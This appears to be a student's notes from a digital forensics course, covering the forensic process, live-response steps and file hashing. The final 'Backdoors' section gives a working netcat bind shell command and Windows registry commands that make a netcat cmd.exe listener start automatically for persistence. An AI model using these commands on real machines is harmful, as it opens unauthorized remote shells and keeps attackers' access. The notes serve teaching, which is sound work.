Notes from CPNT-250 course at SAIT.

The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation and presentation of digital evidence for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operation… - (2001) Digital Forensic Research Workshop (DFRWS)

Digital archaeology is about the direct effects from user activity, such as file contents, file access time stamps, information from deleted files, and network flow logs. … Digital geology is about autonomous processes that users have no direct control over, such as the allocation and recycling of disk blocks, file ID numbers, memory pages or process ID number… - Digital Forensics with Open Source Tools

Traces left behind due to event are known as ‘artifacts’.

The digital Forensics Process:

Acquisition -> Analysis -> Presentation

Acquisition

Collection of digital media to be examined:

Analysis

Presentation

Process which shares results of the analysis phase with interested parties.

Steps

  1. Preserve volatile data.
  2. Inspect network activity.
  3. Collect clipboard data.
  4. Collect process information.
  5. Identify users.
  6. Process to executable mapping.
  7. Correlate open ports with processes.
  8. Collect system details.
  9. Identify services and drivers.
  10. Determine scheduled tasks.
  11. Non-volatile data collection from live system.
  12. Forensic duplication/preservation of media.

Elements of a good process

Evidence

Hashing

Example:

$ md5sum favicon.ico 
4a7edeeac75a39d6d0a7a3bf7f73e22f  favicon.ico

Backdoors

Is a hidden process that runs on target machine and allows a normally unauthorized user to control the computer. It allows you to return to the target machine at any time.

One of the first tasks to complete upon gaining access to a system is to migrate your shell to a more permanent home.

Netcat

Netcat can be used to function as either a client or server. As a client, it can be used to make a network connection to another service. As a server, it acts as a listener and waits to accept incoming connections.

Start server:

$ nc -l -p 3335 -e /bin/bash

Connect as client:

$ telnet localhost 3335

On unix based systems you can add a cron to restart a persistent backdoor.

On windows systems you can modify the registry to start the backdoor.

> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
  > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d'C:\windows\system32\nc.exe -Ldp 3333 -e cmd.exe'
  > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
comments powered by Disqus